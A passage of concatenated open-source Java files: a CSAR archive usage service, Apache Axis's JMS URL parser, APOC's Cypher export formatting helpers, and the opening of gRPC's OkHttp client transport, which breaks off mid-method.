ArchiveDelegateType.APPLICATION.toString())) { throw new UnsupportedOperationException("Cannot delete an application csar from here "); } List<Usage> relatedResourceList = getCsarRelatedResourceList(csar); if (relatedResourceList.isEmpty()) { deleteCsar(csar); } return relatedResourceList; } /** * Get the list of resources that are using the given archive. 
* * @param csar The archive for which to get usage. * @return The list of usage of the archive. */ public List<Usage> getCsarRelatedResourceList(Csar csar) { if (csar == null) { log.debug("You have requested a resource list for a invalid csar object : <" + csar + ">"); return Lists.newArrayList(); } ArchiveUsageRequestEvent archiveUsageRequestEvent = new ArchiveUsageRequestEvent(this, csar.getName(), csar.getVersion()); // Archive from applications are used by the application. if (Objects.equals(csar.getDelegateType(), ArchiveDelegateType.APPLICATION.toString())) { // The CSAR is from an application's topology Application application = applicationService.checkAndGetApplication(csar.getDelegateId()); archiveUsageRequestEvent .addUsage(new Usage(application.getName(), Application.class.getSimpleName().toLowerCase(), csar.getDelegateId(), csar.getWorkspace())); } // a csar that is a dependency of another csar can not be deleted Csar[] relatedCsars = getDependantCsars(csar.getName(), csar.getVersion()); if (ArrayUtils.isNotEmpty(relatedCsars)) { archiveUsageRequestEvent.addUsages(generateCsarsInfo(relatedCsars)); } // check if some of the nodes are used in topologies. 
Topology[] topologies = getDependantTopologies(csar.getName(), csar.getVersion()); if (topologies != null && topologies.length > 0) { archiveUsageRequestEvent.addUsages(generateTopologiesInfo(topologies)); } // a csar that is a dependency of location can not be deleted Location[] relatedLocations = getDependantLocations(csar.getName(), csar.getVersion()); if (relatedLocations != null && relatedLocations.length > 0) { archiveUsageRequestEvent.addUsages(generateLocationsInfo(relatedLocations)); } publisher.publishEvent(archiveUsageRequestEvent); return archiveUsageRequestEvent.getUsages(); } /** * Generate resources related to a csar list * * @param csars * @return */ public List<Usage> generateCsarsInfo(Csar[] csars) { String resourceName; String resourceId; List<Usage> resourceList = Lists.newArrayList(); for (Csar csar : csars) { if (ArchiveDelegateType.APPLICATION.toString().equals(csar.getDelegateType())) { Application application = applicationService.checkAndGetApplication(csar.getDelegateId()); resourceName = application.getName(); } else { resourceName = csar.getName(); } Usage temp = new Usage(resourceName, Csar.class.getSimpleName().toLowerCase(), csar.getId(), csar.getWorkspace()); resourceList.add(temp); } return resourceList; } /** * Generate resources related to a locations list * * @param locations * @return */ public List<Usage> generateLocationsInfo(Location[] locations) { String resourceName; String resourceId; List<Usage> resourceList = Lists.newArrayList(); for (Location location : locations) { resourceName = location.getName(); resourceId = location.getId(); Usage temp = new Usage(resourceName, Location.class.getSimpleName().toLowerCase(), resourceId, AlienConstants.GLOBAL_WORKSPACE_ID); resourceList.add(temp); } return resourceList; } /** * Generate resources (application or template) related to a topology list * * @param topologies * @return */ public List<Usage> generateTopologiesInfo(Topology[] topologies) { List<Usage> resourceList = 
Lists.newArrayList(); List<Csar> topologiesCsar = getTopologiesCsar(topologies); for (Csar csar : topologiesCsar) { if (Objects.equals(csar.getDelegateType(), ArchiveDelegateType.APPLICATION.toString())) { // get the related application Application application = applicationService.checkAndGetApplication(csar.getDelegateId()); resourceList.add(new Usage(application.getName(), csar.getDelegateType(), csar.getDelegateId(), csar.getWorkspace())); } else { resourceList.add(new Usage(csar.getName() + "[" + csar.getVersion() + "]", "topologyTemplate", csar.getId(), csar.getWorkspace())); } } return resourceList; } }
/* * Copyright 2001, 2002,2004 The Apache Software Foundation. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.axis.transport.jms; import java.net.URL; import java.util.HashMap; import java.util.Iterator; import java.util.Map; import java.util.StringTokenizer; import java.util.Vector; /** * JMSURLHelper provides access to properties in the URL. * The URL must be of the form: "jms:/&lt;destination&gt;?[&lt;property&gt;=&lt;key&gt;&amp;]*" * * @author Ray Chun (rchun@sonicsoftware.com) */ public class JMSURLHelper { private URL url; // the only property not in the query string private String destination; // vendor-specific properties private HashMap properties; // required properties private Vector requiredProperties; //application-specific JMS message properties private Vector appProperties; public JMSURLHelper(java.net.URL url) throws java.net.MalformedURLException { this(url, null); } public JMSURLHelper(java.net.URL url, String[] requiredProperties) throws java.net.MalformedURLException { this.url = url; properties = new HashMap(); appProperties = new Vector(); // the path should be something like '/SampleQ1' // clip the leading '/' if there is one destination = url.getPath(); if (destination.startsWith("/")) destination = destination.substring(1); if ((destination == null) || (destination.trim().length() < 1)) throw new java.net.MalformedURLException("Missing destination in URL"); // parse the query string and populate the properties table String query = 
url.getQuery(); StringTokenizer st = new StringTokenizer(query, "&;"); while (st.hasMoreTokens()) { String keyValue = st.nextToken(); int eqIndex = keyValue.indexOf("="); if (eqIndex > 0) { String key = keyValue.substring(0, eqIndex); String value = keyValue.substring(eqIndex+1); if (key.startsWith(JMSConstants._MSG_PROP_PREFIX)) { key = key.substring( JMSConstants._MSG_PROP_PREFIX.length()); addApplicationProperty(key); } properties.put(key, value); } } // set required properties addRequiredProperties(requiredProperties); validateURL(); } public String getDestination() { return destination; } public void setDestination(String destination) { this.destination = destination; } public String getVendor() { return getPropertyValue(JMSConstants._VENDOR); } public String getDomain() { return getPropertyValue(JMSConstants._DOMAIN); } public HashMap getProperties() { return properties; } public String getPropertyValue(String property) { return (String)properties.get(property); } public void addRequiredProperties(String[] properties) { if (properties == null) return; for (int i = 0; i < properties.length; i++) { addRequiredProperty(properties[i]); } } public void addRequiredProperty(String property) { if (property == null) return; if (requiredProperties == null) requiredProperties = new Vector(); requiredProperties.addElement(property); } public Vector getRequiredProperties() { return requiredProperties; } /** Adds the name of a property from the url properties that should * be added to the JMS message. */ public void addApplicationProperty(String property) { if (property == null) return; if (appProperties == null) appProperties = new Vector(); appProperties.addElement(property); } /** Adds the name and value od the application property to the * JMS URL. 
*/ public void addApplicationProperty(String property, String value) { if (property == null) return; if (appProperties == null) appProperties = new Vector(); properties.put(property, value); appProperties.addElement(property); } /** Returns a collection of properties that are defined within the * JMS URL to be added directly to the JMS messages. @return collection or null depending on presence of elements */ public Vector getApplicationProperties() { return appProperties; } /** Returns a URL formatted String. The properties of the URL may not end up in the same order as the JMS URL that was originally used to create this object. */ public String getURLString() { StringBuffer text = new StringBuffer("jms:/"); text.append(getDestination()); text.append("?"); Map props = (Map)properties.clone(); boolean firstEntry = true; for(Iterator itr=properties.keySet().iterator(); itr.hasNext();) { String key = (String)itr.next(); if (!firstEntry) { text.append("&"); } if (appProperties.contains(key)) { text.append(JMSConstants._MSG_PROP_PREFIX); } text.append(key); text.append("="); text.append(props.get(key)); firstEntry = false; } return text.toString(); } /** Returns a formatted URL String with the assigned properties */ public String toString() { return getURLString(); } private void validateURL() throws java.net.MalformedURLException { Vector required = getRequiredProperties(); if (required == null) return; for (int i = 0; i < required.size(); i++) { String key = (String)required.elementAt(i); if (properties.get(key) == null) throw new java.net.MalformedURLException(); } } }
package apoc.export.cypher.formatter;

import apoc.export.util.FormatUtils;
import apoc.util.Util;
import org.neo4j.graphdb.Label;
import org.neo4j.graphdb.Node;
import org.neo4j.graphdb.Relationship;
import org.neo4j.internal.helpers.collection.Iterables;
import org.neo4j.values.storable.DurationValue;
import org.neo4j.values.storable.Value;
import org.neo4j.values.storable.Values;

import java.lang.reflect.Array;
import java.time.temporal.Temporal;
import java.util.*;
import java.util.stream.Collectors;

import static apoc.export.util.FormatUtils.getLabelsSorted;

/**
 * Static helpers used by the Cypher export formatters to render nodes,
 * relationships, labels and property values as Cypher text.
 *
 * @author AgileLARUS
 *
 * @since 16-06-2017
 */
public class CypherFormatterUtils {

    // Synthetic label/property attached to exported nodes that carry no unique
    // constraint, so the import scripts can still match them unambiguously.
    public final static String UNIQUE_ID_LABEL = "UNIQUE IMPORT LABEL";
    public final static String UNIQUE_ID_PROP = "UNIQUE IMPORT ID";
    public final static String Q_UNIQUE_ID_LABEL = quote(UNIQUE_ID_LABEL);
    // Template for rendering a value through a Cypher constructor function,
    // e.g. date('2018-01-01').
    public final static String FUNCTION_TEMPLATE = "%s('%s')";

    // ---- node id ----

    /**
     * Renders a node lookup pattern such as {@code (n:Label{`key`:value})},
     * identifying the node by its unique-constraint properties (or by the
     * synthetic import id when no constraint applies).
     */
    public static String formatNodeLookup(String id, Node node, Map<String, Set<String>> uniqueConstraints, Set<String> indexNames) {
        StringBuilder result = new StringBuilder(100);
        result.append("(");
        result.append(id);
        result.append(getNodeIdLabels(node, uniqueConstraints, indexNames));
        Map<String, Object> nodeIdProperties = getNodeIdProperties(node, uniqueConstraints);
        if (nodeIdProperties.size() > 0) {
            result.append("{");
            StringBuilder props = new StringBuilder(100);
            for (String prop : nodeIdProperties.keySet()) {
                props.append(", ");
                props.append(quote(prop));
                props.append(":");
                props.append(CypherFormatterUtils.toString(nodeIdProperties.get(prop)));
            }
            // drop the leading ", " separator
            result.append(props.substring(2));
            result.append("}");
        }
        result.append(")");
        return result.toString();
    }

    /**
     * Collects the properties that uniquely identify {@code node}: the values
     * backing every matching unique constraint, or the synthetic import id when
     * no constraint matches.
     */
    public static Map<String, Object> getNodeIdProperties(Node node, Map<String, Set<String>> uniqueConstraints) {
        Map<String, Object> nodeIdProperties = new LinkedHashMap<>();
        List<String> list = getLabelsSorted(node);
        for (String labelName : list) {
            if (!isUniqueLabelFound(node, uniqueConstraints, labelName)) {
                continue;
            }
            uniqueConstraints.get(labelName).forEach(prop -> {
                nodeIdProperties.put(prop, node.getProperty(prop));
            });
        }
        if (nodeIdProperties.isEmpty()) {
            // no unique constraint matched: fall back to the internal node id
            nodeIdProperties.put(UNIQUE_ID_PROP, node.getId());
        }
        return nodeIdProperties;
    }

    // ---- labels ----

    /**
     * Renders every label of {@code node}. Labels present in {@code indexNames}
     * are moved to the front of the label chain; the synthetic import label is
     * appended when no uniquely-constrained label was found.
     */
    public static String formatAllLabels(Node node, Map<String, Set<String>> uniqueConstraints, Set<String> indexNames) {
        StringBuilder result = new StringBuilder(100);
        boolean uniqueLabelFound = false;
        List<String> list = getLabelsSorted(node);
        for (String labelName : list) {
            if (!uniqueLabelFound) {
                uniqueLabelFound = isUniqueLabelFound(node, uniqueConstraints, labelName);
            }
            if (indexNames != null && indexNames.contains(labelName))
                result.insert(0, label(labelName));
            else
                result.append(label(labelName));
        }
        if (!uniqueLabelFound) {
            result.append(label(UNIQUE_ID_LABEL));
        }
        return result.toString();
    }

    /**
     * Renders {@code id:Label} terms for the labels NOT covered by a unique
     * constraint (used when remaining labels are SET in a separate statement).
     */
    public static String formatNotUniqueLabels(String id, Node node, Map<String, Set<String>> uniqueConstraints) {
        StringBuilder result = new StringBuilder(100);
        List<String> list = getLabelsSorted(node);
        for (String labelName : list) {
            if (!isUniqueLabelFound(node, uniqueConstraints, labelName)) {
                result.append(", ");
                result.append(id);
                result.append(label(labelName));
            }
        }
        return formatToString(result);
    }

    // Labels used to identify the node in a lookup: the uniquely-constrained
    // labels when present (indexed ones moved to the front), otherwise the
    // synthetic import label.
    private static String getNodeIdLabels(Node node, Map<String, Set<String>> uniqueConstraints, Set<String> indexNames) {
        StringBuilder result = new StringBuilder(100);
        List<String> list = getLabelsSorted(node).stream()
                .filter(labelName -> isUniqueLabelFound(node, uniqueConstraints, labelName))
                .collect(Collectors.toList());
        if (list.isEmpty()) {
            result.append(label(UNIQUE_ID_LABEL));
        } else {
            list.forEach(labelName -> {
                if (indexNames != null && indexNames.contains(labelName)) {
                    result.insert(0, label(labelName));
                } else {
                    result.append(label(labelName));
                }
            });
        }
        return result.toString();
    }

    /**
     * Returns true when a unique constraint exists for {@code labelName} and
     * the node carries every property that constraint requires.
     */
    public static boolean isUniqueLabelFound(Node node, Map<String, Set<String>> uniqueConstraints, String labelName) {
        if (uniqueConstraints.containsKey(labelName)) {
            Set<String> nodeUniqueConstraint = uniqueConstraints.get(labelName);
            return nodeUniqueConstraint.stream().allMatch(node::hasProperty);
        } else {
            return false;
        }
    }

    // ---- properties ----

    /**
     * Renders all node properties, additionally emitting the synthetic import
     * id when the node is identified by the import label rather than by a
     * unique constraint.
     */
    public static String formatNodeProperties(String id, Node node, Map<String, Set<String>> uniqueConstraints, Set<String> indexNames, boolean jsonStyle) {
        StringBuilder result = formatProperties(id, node.getAllProperties(), jsonStyle);
        if (getNodeIdLabels(node, uniqueConstraints, indexNames).endsWith(label(UNIQUE_ID_LABEL))) {
            result.append(", ");
            result.append(formatPropertyName(id, UNIQUE_ID_PROP, node.getId(), jsonStyle));
        }
        return formatToString(result);
    }

    /** Renders all properties of a relationship. */
    public static String formatRelationshipProperties(String id, Relationship relationship, boolean jsonStyle) {
        StringBuilder result = formatProperties(id, relationship.getAllProperties(), jsonStyle);
        return formatToString(result);
    }

    /**
     * Renders the properties that are not part of the node's identifying set,
     * listing indexed properties first (keys sorted within each group).
     */
    public static String formatNotUniqueProperties(String id, Node node, Map<String, Set<String>> uniqueConstraints, Set<String> indexedProperties, boolean jsonStyle) {
        Map<String, Object> properties = new LinkedHashMap<>();
        List<String> keys = Iterables.asList(node.getPropertyKeys());
        Collections.sort(keys);
        Map<String, Object> nodeIdProperties = getNodeIdProperties(node, uniqueConstraints);
        // first pass: indexed, non-identifying properties
        for (String prop : keys) {
            if (!nodeIdProperties.containsKey(prop) && indexedProperties.contains(prop))
                properties.put(prop, node.getProperty(prop));
        }
        // second pass: remaining non-identifying properties
        for (String prop : keys) {
            if (!nodeIdProperties.containsKey(prop) && !indexedProperties.contains(prop))
                properties.put(prop, node.getProperty(prop));
        }
        StringBuilder result = new StringBuilder(100);
        for (String key : properties.keySet()) {
            result.append(", ");
            result.append(formatPropertyName(id, key, properties.get(key), jsonStyle));
        }
        return formatToString(result);
    }

    // Strips the leading ", " separator produced by the append loops above.
    public static String formatToString(StringBuilder result) {
        return result.length() > 0 ? result.substring(2) : "";
    }

    public static StringBuilder formatProperties(Map<String, Object> properties) {
        return formatProperties("", properties, true);
    }

    /**
     * Renders {@code properties} as ", key:value" pairs with sorted keys; the
     * leading separator is stripped later by {@link #formatToString(StringBuilder)}.
     */
    public static StringBuilder formatProperties(String id, Map<String, Object> properties, boolean jsonStyle) {
        StringBuilder result = new StringBuilder(100);
        if (properties != null) {
            List<String> keys = Iterables.asList(properties.keySet());
            Collections.sort(keys);
            for (String prop : keys) {
                result.append(", ");
                result.append(formatPropertyName(id, prop, properties.get(prop), jsonStyle));
            }
        }
        return result;
    }

    /**
     * Renders one property as {@code id.`key`:value} (json style) or
     * {@code id.`key`=value}; the {@code id.} prefix is omitted when id is empty.
     */
    public static String formatPropertyName(String id, String prop, Object value, boolean jsonStyle) {
        return (id != null && !"".equals(id) ? id + "." : "") + quote(prop) + (jsonStyle ? ":" : "=" ) + toString(value);
    }

    // ---- to string ----

    /** Quotes each identifier and joins them with commas. */
    public static String quote(Iterable<String> ids) {
        StringBuilder builder = new StringBuilder();
        for (Iterator<String> iterator = ids.iterator(); iterator.hasNext(); ) {
            String id = iterator.next();
            builder.append(quote(id));
            if (iterator.hasNext()) {
                builder.append(",");
            }
        }
        return builder.toString();
    }

    /**
     * @deprecated use {@link Util#quote(String)} directly
     */
    @Deprecated
    public static String quote(String id) {
        return Util.quote(id);
    }

    /** Renders a label term, e.g. {@code :`My Label`}. */
    public static String label(String id) {
        return ":" + quote(id);
    }

    /**
     * Renders any supported property value as a Cypher literal: strings and
     * numbers via FormatUtils, collections/arrays as bracketed lists, and
     * temporal/duration values as constructor-function calls.
     */
    public static String toString(Object value) {
        if (value == null) return "null";
        if (value instanceof String) return FormatUtils.formatString(value);
        if (value instanceof Number) {
            return FormatUtils.formatNumber((Number) value);
        }
        if (value instanceof Boolean) return value.toString();
        if (value instanceof Iterator) {
            return toString(((Iterator) value));
        }
        if (value instanceof Iterable) {
            return toString(((Iterable) value).iterator());
        }
        if (value.getClass().isArray()) {
            return arrayToString(value);
        }
        if (value instanceof Temporal) {
            Value val = Values.of(value);
            return toStringFunction(val);
        }
        if (value instanceof DurationValue) {
            return toStringFunction((DurationValue) value);
        }
        return value.toString();
    }

    // Renders a typed value as a Cypher function call, e.g. date('...').
    private static String toStringFunction(Value value) {
        return String.format(FUNCTION_TEMPLATE, value.getTypeName().toLowerCase(), value.toString());
    }

    /** Renders the iterator's elements as a bracketed, comma-separated list. */
    public static String toString(Iterator<?> iterator) {
        StringBuilder result = new StringBuilder();
        while (iterator.hasNext()) {
            if (result.length() > 0) result.append(", ");
            Object value = iterator.next();
            result.append(toString(value));
        }
        return "[" + result + "]";
    }

    /** Renders a (possibly primitive) array as a bracketed list. */
    public static String arrayToString(Object value) {
        int length = Array.getLength(value);
        StringBuilder result = new StringBuilder(10 * length);
        for (int i = 0; i < length; i++) {
            if (i > 0) result.append(", ");
            result.append(toString(Array.get(value, i)));
        }
        return "[" + result.toString() + "]";
    }

    /** Renders a node pattern for the given label, e.g. {@code (:`Label`)}. */
    public static String cypherNode(Label label) {
        return String.format("(%s)", label == null ? "" : ":" + Util.quote(label.name()));
    }
}
/* * Copyright 2014, Google Inc. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following disclaimer * in the documentation and/or other materials provided with the * distribution. * * * Neither the name of Google Inc. nor the names of its * contributors may be used to endorse or promote products derived from * this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*/ package io.grpc.okhttp; import static com.google.common.base.Preconditions.checkState; import static io.grpc.internal.GrpcUtil.TIMER_SERVICE; import com.google.common.annotations.VisibleForTesting; import com.google.common.base.Preconditions; import com.google.common.base.Stopwatch; import com.google.common.base.Ticker; import com.google.common.util.concurrent.SettableFuture; import io.grpc.Attributes; import io.grpc.CallOptions; import io.grpc.Metadata; import io.grpc.MethodDescriptor; import io.grpc.MethodDescriptor.MethodType; import io.grpc.Status; import io.grpc.Status.Code; import io.grpc.internal.ConnectionClientTransport; import io.grpc.internal.GrpcUtil; import io.grpc.internal.Http2Ping; import io.grpc.internal.KeepAliveManager; import io.grpc.internal.SerializingExecutor; import io.grpc.internal.SharedResourceHolder; import io.grpc.okhttp.internal.ConnectionSpec; import io.grpc.okhttp.internal.framed.ErrorCode; import io.grpc.okhttp.internal.framed.FrameReader; import io.grpc.okhttp.internal.framed.FrameWriter; import io.grpc.okhttp.internal.framed.Header; import io.grpc.okhttp.internal.framed.HeadersMode; import io.grpc.okhttp.internal.framed.Http2; import io.grpc.okhttp.internal.framed.Settings; import io.grpc.okhttp.internal.framed.Variant; import okio.Buffer; import okio.BufferedSink; import okio.BufferedSource; import okio.ByteString; import okio.Okio; import okio.Source; import okio.Timeout; import java.io.IOException; import java.net.InetSocketAddress; import java.net.Socket; import java.net.URI; import java.util.Collections; import java.util.EnumMap; import java.util.HashMap; import java.util.Iterator; import java.util.LinkedList; import java.util.List; import java.util.Map; import java.util.Random; import java.util.concurrent.Executor; import java.util.concurrent.ScheduledExecutorService; import java.util.logging.Level; import java.util.logging.Logger; import javax.annotation.Nullable; import javax.annotation.concurrent.GuardedBy; import 
javax.net.ssl.SSLSocketFactory;

/**
 * An OkHttp-based {@link ConnectionClientTransport} implementation.
 *
 * <p>Shared mutable state is protected by {@code lock}; callbacks into
 * streams and the listener are deliberately made outside the lock where
 * noted to avoid lock-ordering problems.
 */
class OkHttpClientTransport implements ConnectionClientTransport {
  private static final Map<ErrorCode, Status> ERROR_CODE_TO_STATUS = buildErrorCodeToStatusMap();
  private static final Logger log = Logger.getLogger(OkHttpClientTransport.class.getName());
  private static final OkHttpClientStream[] EMPTY_STREAM_ARRAY = new OkHttpClientStream[0];

  // Maps HTTP/2 error codes to the gRPC Status reported to affected streams.
  private static Map<ErrorCode, Status> buildErrorCodeToStatusMap() {
    Map<ErrorCode, Status> errorToStatus = new EnumMap<ErrorCode, Status>(ErrorCode.class);
    errorToStatus.put(ErrorCode.NO_ERROR,
        Status.INTERNAL.withDescription("No error: A GRPC status of OK should have been sent"));
    errorToStatus.put(ErrorCode.PROTOCOL_ERROR,
        Status.INTERNAL.withDescription("Protocol error"));
    errorToStatus.put(ErrorCode.INTERNAL_ERROR,
        Status.INTERNAL.withDescription("Internal error"));
    errorToStatus.put(ErrorCode.FLOW_CONTROL_ERROR,
        Status.INTERNAL.withDescription("Flow control error"));
    errorToStatus.put(ErrorCode.STREAM_CLOSED,
        Status.INTERNAL.withDescription("Stream closed"));
    errorToStatus.put(ErrorCode.FRAME_TOO_LARGE,
        Status.INTERNAL.withDescription("Frame too large"));
    errorToStatus.put(ErrorCode.REFUSED_STREAM,
        Status.UNAVAILABLE.withDescription("Refused stream"));
    errorToStatus.put(ErrorCode.CANCEL,
        Status.CANCELLED.withDescription("Cancelled"));
    errorToStatus.put(ErrorCode.COMPRESSION_ERROR,
        Status.INTERNAL.withDescription("Compression error"));
    errorToStatus.put(ErrorCode.CONNECT_ERROR,
        Status.INTERNAL.withDescription("Connect error"));
    errorToStatus.put(ErrorCode.ENHANCE_YOUR_CALM,
        Status.RESOURCE_EXHAUSTED.withDescription("Enhance your calm"));
    errorToStatus.put(ErrorCode.INADEQUATE_SECURITY,
        Status.PERMISSION_DENIED.withDescription("Inadequate security"));
    return Collections.unmodifiableMap(errorToStatus);
  }

  private final InetSocketAddress address;
  private final String defaultAuthority;
  private final String userAgent;
  private final Random random = new Random();
  private final Ticker ticker;
  private Listener listener;
  private FrameReader testFrameReader;
  private AsyncFrameWriter frameWriter;
  private OutboundFlowController outboundFlow;
  private final Object lock = new Object();
  @GuardedBy("lock")
  private int nextStreamId;
  @GuardedBy("lock")
  private final Map<Integer, OkHttpClientStream> streams =
      new HashMap<Integer, OkHttpClientStream>();
  private final Executor executor;
  // Wrap on executor, to guarantee some operations be executed serially.
  private final SerializingExecutor serializingExecutor;
  private final int maxMessageSize;
  private int connectionUnacknowledgedBytesRead;
  private ClientFrameHandler clientFrameHandler;
  /**
   * Indicates the transport is in go-away state: no new streams will be processed, but existing
   * streams may continue.
   */
  @GuardedBy("lock")
  private Status goAwayStatus;
  @GuardedBy("lock")
  private boolean goAwaySent;
  @GuardedBy("lock")
  private Http2Ping ping;
  @GuardedBy("lock")
  private boolean stopped;
  @GuardedBy("lock")
  private boolean inUse;
  private SSLSocketFactory sslSocketFactory;
  private Socket socket;
  @GuardedBy("lock")
  private int maxConcurrentStreams = 0;
  // Streams waiting for capacity under the server's MAX_CONCURRENT_STREAMS.
  @GuardedBy("lock")
  private LinkedList<OkHttpClientStream> pendingStreams =
      new LinkedList<OkHttpClientStream>();
  private final ConnectionSpec connectionSpec;
  private FrameWriter testFrameWriter;
  private ScheduledExecutorService scheduler;
  private KeepAliveManager keepAliveManager;
  private boolean enableKeepAlive;
  private long keepAliveDelayNanos;
  private long keepAliveTimeoutNanos;

  // The following fields should only be used for test.
  Runnable connectingCallback;
  SettableFuture<Void> connectedFuture;

  OkHttpClientTransport(InetSocketAddress address, String authority, @Nullable String userAgent,
      Executor executor, @Nullable SSLSocketFactory sslSocketFactory,
      ConnectionSpec connectionSpec, int maxMessageSize) {
    this.address = Preconditions.checkNotNull(address, "address");
    this.defaultAuthority = authority;
    this.maxMessageSize = maxMessageSize;
    this.executor = Preconditions.checkNotNull(executor, "executor");
    serializingExecutor = new SerializingExecutor(executor);
    // Client initiated streams are odd, server initiated ones are even. Server should not need to
    // use it. We start clients at 3 to avoid conflicting with HTTP negotiation.
    nextStreamId = 3;
    this.sslSocketFactory = sslSocketFactory;
    this.connectionSpec = Preconditions.checkNotNull(connectionSpec, "connectionSpec");
    this.ticker = Ticker.systemTicker();
    this.userAgent = GrpcUtil.getGrpcUserAgent("okhttp", userAgent);
  }

  /**
   * Create a transport connected to a fake peer for test.
   */
  @VisibleForTesting
  OkHttpClientTransport(String userAgent, Executor executor, FrameReader frameReader,
      FrameWriter testFrameWriter, int nextStreamId, Socket socket, Ticker ticker,
      @Nullable Runnable connectingCallback, SettableFuture<Void> connectedFuture,
      int maxMessageSize) {
    address = null;
    this.maxMessageSize = maxMessageSize;
    defaultAuthority = "notarealauthority:80";
    this.userAgent = GrpcUtil.getGrpcUserAgent("okhttp", userAgent);
    this.executor = Preconditions.checkNotNull(executor);
    serializingExecutor = new SerializingExecutor(executor);
    this.testFrameReader = Preconditions.checkNotNull(frameReader);
    this.testFrameWriter = Preconditions.checkNotNull(testFrameWriter);
    this.socket = Preconditions.checkNotNull(socket);
    this.nextStreamId = nextStreamId;
    this.ticker = ticker;
    this.connectionSpec = null;
    this.connectingCallback = connectingCallback;
    this.connectedFuture = Preconditions.checkNotNull(connectedFuture);
  }

  /**
   * Enable keepalive with custom delay and timeout.
   */
  void enableKeepAlive(boolean enable, long keepAliveDelayNanos,
      long keepAliveTimeoutNanos) {
    enableKeepAlive = enable;
    this.keepAliveDelayNanos = keepAliveDelayNanos;
    this.keepAliveTimeoutNanos = keepAliveTimeoutNanos;
  }

  // The test constructor leaves address null; used to pick the fake-peer path.
  private boolean isForTest() {
    return address == null;
  }

  @Override
  public void ping(final PingCallback callback, Executor executor) {
    checkState(frameWriter != null);
    long data = 0;
    Http2Ping p;
    boolean writePing;
    synchronized (lock) {
      if (stopped) {
        Http2Ping.notifyFailed(callback, executor, getPingFailure());
        return;
      }
      if (ping != null) {
        // we only allow one outstanding ping at a time, so just add the callback to
        // any outstanding operation
        p = ping;
        writePing = false;
      } else {
        // set outstanding operation and then write the ping after releasing lock
        data = random.nextLong();
        p = ping = new Http2Ping(data, Stopwatch.createStarted(ticker));
        writePing = true;
      }
    }
    if (writePing) {
      // PING payload is 8 bytes, sent as two 32-bit halves.
      frameWriter.ping(false, (int) (data >>> 32), (int) data);
    }
    // If transport concurrently failed/stopped since we released the lock above, this could
    // immediately invoke callback (which we shouldn't do while holding a lock)
    p.addCallback(callback, executor);
  }

  /** Creates a new stream; it is not started until streamReadyToStart is called. */
  @Override
  public OkHttpClientStream newStream(final MethodDescriptor<?, ?> method,
      final Metadata headers, CallOptions callOptions) {
    Preconditions.checkNotNull(method, "method");
    Preconditions.checkNotNull(headers, "headers");
    return new OkHttpClientStream(method, headers, frameWriter, OkHttpClientTransport.this,
        outboundFlow, lock, maxMessageSize, defaultAuthority, userAgent);
  }

  @Override
  public OkHttpClientStream newStream(final MethodDescriptor<?, ?> method,
      final Metadata headers) {
    return newStream(method, headers, CallOptions.DEFAULT);
  }

  // Starts the stream now, or queues it if at the concurrent-stream limit, or
  // fails it immediately when the transport is already in go-away state.
  @GuardedBy("lock")
  void streamReadyToStart(OkHttpClientStream clientStream) {
    synchronized (lock) {
      if (goAwayStatus != null) {
        clientStream.transportReportStatus(goAwayStatus, true, new Metadata());
      } else if (streams.size() >= maxConcurrentStreams) {
        pendingStreams.add(clientStream);
        setInUse();
      } else {
        startStream(clientStream);
      }
    }
  }

  // Assigns the next odd stream id and starts the stream on the wire.
  @GuardedBy("lock")
  private void startStream(OkHttpClientStream stream) {
    Preconditions.checkState(stream.id() == null, "StreamId already assigned");
    streams.put(nextStreamId, stream);
    setInUse();
    stream.start(nextStreamId);
    stream.allocated();
    // For unary and server streaming, there will be a data frame soon, no need to flush the header.
    if (stream.getType() != MethodType.UNARY
        && stream.getType() != MethodType.SERVER_STREAMING) {
      frameWriter.flush();
    }
    if (nextStreamId >= Integer.MAX_VALUE - 2) {
      // Make sure nextStreamId greater than all used id, so that mayHaveCreatedStream() performs
      // correctly.
      nextStreamId = Integer.MAX_VALUE;
      startGoAway(Integer.MAX_VALUE, ErrorCode.NO_ERROR,
          Status.UNAVAILABLE.withDescription("Stream ids exhausted"));
    } else {
      nextStreamId += 2;
    }
  }

  /**
   * Starts pending streams, returns true if at least one pending stream is started.
   */
  @GuardedBy("lock")
  private boolean startPendingStreams() {
    boolean hasStreamStarted = false;
    while (!pendingStreams.isEmpty() && streams.size() < maxConcurrentStreams) {
      OkHttpClientStream stream = pendingStreams.poll();
      startStream(stream);
      hasStreamStarted = true;
    }
    return hasStreamStarted;
  }

  /**
   * Removes given pending stream, used when a pending stream is cancelled.
   */
  @GuardedBy("lock")
  void removePendingStream(OkHttpClientStream pendingStream) {
    pendingStreams.remove(pendingStream);
    maybeClearInUse();
  }

  @Override
  public void start(Listener listener) {
    this.listener = Preconditions.checkNotNull(listener, "listener");

    if (enableKeepAlive) {
      scheduler = SharedResourceHolder.get(TIMER_SERVICE);
      keepAliveManager = new KeepAliveManager(this, scheduler, keepAliveDelayNanos,
          keepAliveTimeoutNanos);
    }

    frameWriter = new AsyncFrameWriter(this, serializingExecutor);
